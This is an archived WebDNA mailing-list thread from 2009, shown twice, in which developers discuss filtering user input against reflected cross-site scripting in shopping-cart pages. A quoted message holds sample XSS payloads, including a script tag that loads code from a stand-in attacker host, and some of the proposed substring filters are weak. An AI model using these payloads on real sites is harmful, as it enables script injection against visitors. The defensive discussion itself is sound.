This = seems to work for me.
It seems to stand up to the attacks from = McAfee Secure
[formvariables]
[showif = [url][name][/url]^script>][redirect /index.html][/showif]
[showif = [url][name][/url]^iframe][redirect /index.html][/showif]
= [text][url][name][/url]=3D[input][value][/input][/text]
= [/formvariables]
[showif = [countchars][cart][/countchars]>18][redirect = /index.html][/showif]
Matthew A Perosi JewelerWebsites.com ------------------------------by Psi Prime------- Senior Web Developer 323 Union Blvd. Totowa, NJ 07512 Pre-Sales: 888.872.0274 Service: 973.413.8213 Training: 973.413.8214 Fax: 973.413.8217 http://www.jewelerwebsites.com= http://en.wikipedia= .org/wiki/Psi_Prime%2C_Inc http://www.psiprime.com
=
Marc Thompson wrote:=You are correct Willian NEVER trust user input. What I always do is simply remove any characters I don't recognize using grep. All user input is "cleaned" before taking any action on it whatsoever. For [cart] values: [GetChars start=3D1&end=3D20][Grep search=3D[^0-9]&replace=3D][value][/Grep][/GetChars] For other text values: [GetChars start=3D1&end=3D100][Grep search=3D[^ ,-.%@_A-Za-z0-9=DC=FC=C4=E4=D6=F6]&replace=3D][value][/Grep][/GetChars= ] Marc William DeVaul wrote:I have no idea = about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do? Bill On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor <bob@cybermill.com> wrote:What are = people doing for the following type of attacks? http://www.exampl= e.com/shoppingcart.tpl?cart=3D"<script>alert123</script>" I assume you could just do a [removehtml][cart][/removehtml] I know you can do something like that at the code level but is there something that can be done at the server level or does the new version cicadae have built in protections? More info on the attackhttp://www.example.com/?var=3D= <SCRIPT%20a=3D">"%20SRC=3D"http://www.attacker.com/xss.js"></SCRIPT> This will exploit the reflected cross site scripting vulnerability shown before, executing the javascript code stored on the attacker's web = server as if it was originating from the victim web site, www.example.com. A complete test will include instantiating a variable with several = attack vectors (Check Fuzz vectors appendix and Encoded injection appendix). Finally, analyzing answers can get complex. A simple way to do this is = to use code that pops up a dialog, as in our example. This typically = indicates that an attacker could execute arbitrary JavaScript of his choice in the visitors' browsers.--------------------------------------------------------- This message is sent to you because you are subscribed to the mailing list <talk@webdna.us>. To unsubscribe, E-mail to: <talk-leave@webdna.us> archives: http://mail.webdna.us/l= ist/talk@webdna.us old archives: http://dev.webdna.us/TalkLi= stArchive/ .
|
This = seems to work for me.
It seems to stand up to the attacks from = McAfee Secure
[formvariables]
[showif = [url][name][/url]^script>][redirect /index.html][/showif]
[showif = [url][name][/url]^iframe][redirect /index.html][/showif]
= [text][url][name][/url]=3D[input][value][/input][/text]
= [/formvariables]
[showif = [countchars][cart][/countchars]>18][redirect = /index.html][/showif]
Matthew A Perosi JewelerWebsites.com ------------------------------by Psi Prime------- Senior Web Developer 323 Union Blvd. Totowa, NJ 07512 Pre-Sales: 888.872.0274 Service: 973.413.8213 Training: 973.413.8214 Fax: 973.413.8217 http://www.jewelerwebsites.com= http://en.wikipedia= .org/wiki/Psi_Prime%2C_Inc http://www.psiprime.com
=
Marc Thompson wrote:=You are correct Willian NEVER trust user input. What I always do is simply remove any characters I don't recognize using grep. All user input is "cleaned" before taking any action on it whatsoever. For [cart] values: [GetChars start=3D1&end=3D20][Grep search=3D[^0-9]&replace=3D][value][/Grep][/GetChars] For other text values: [GetChars start=3D1&end=3D100][Grep search=3D[^ ,-.%@_A-Za-z0-9=DC=FC=C4=E4=D6=F6]&replace=3D][value][/Grep][/GetChars= ] Marc William DeVaul wrote:I have no idea = about a server level fix. This goes to never trusting user input. I thought it should always be surrounded by [raw] and [url] to prevent this. What do others do? Bill On Mon, Apr 13, 2009 at 2:08 PM, Bob Minor <bob@cybermill.com> wrote:What are = people doing for the following type of attacks? http://www.exampl= e.com/shoppingcart.tpl?cart=3D"<script>alert123</script>" I assume you could just do a [removehtml][cart][/removehtml] I know you can do something like that at the code level but is there something that can be done at the server level or does the new version cicadae have built in protections? More info on the attackhttp://www.example.com/?var=3D= <SCRIPT%20a=3D">"%20SRC=3D"http://www.attacker.com/xss.js"></SCRIPT> This will exploit the reflected cross site scripting vulnerability shown before, executing the javascript code stored on the attacker's web = server as if it was originating from the victim web site, www.example.com. A complete test will include instantiating a variable with several = attack vectors (Check Fuzz vectors appendix and Encoded injection appendix). Finally, analyzing answers can get complex. A simple way to do this is = to use code that pops up a dialog, as in our example. This typically = indicates that an attacker could execute arbitrary JavaScript of his choice in the visitors' browsers.--------------------------------------------------------- This message is sent to you because you are subscribed to the mailing list <talk@webdna.us>. To unsubscribe, E-mail to: <talk-leave@webdna.us> archives: http://mail.webdna.us/l= ist/talk@webdna.us old archives: http://dev.webdna.us/TalkLi= stArchive/ .
DOWNLOAD WEBDNA NOW!
The WebDNA community talk-list is the best place to get some help: several hundred extremely proficient programmers with an excellent knowledge of WebDNA and an excellent spirit will deliver all the tips and tricks you can imagine...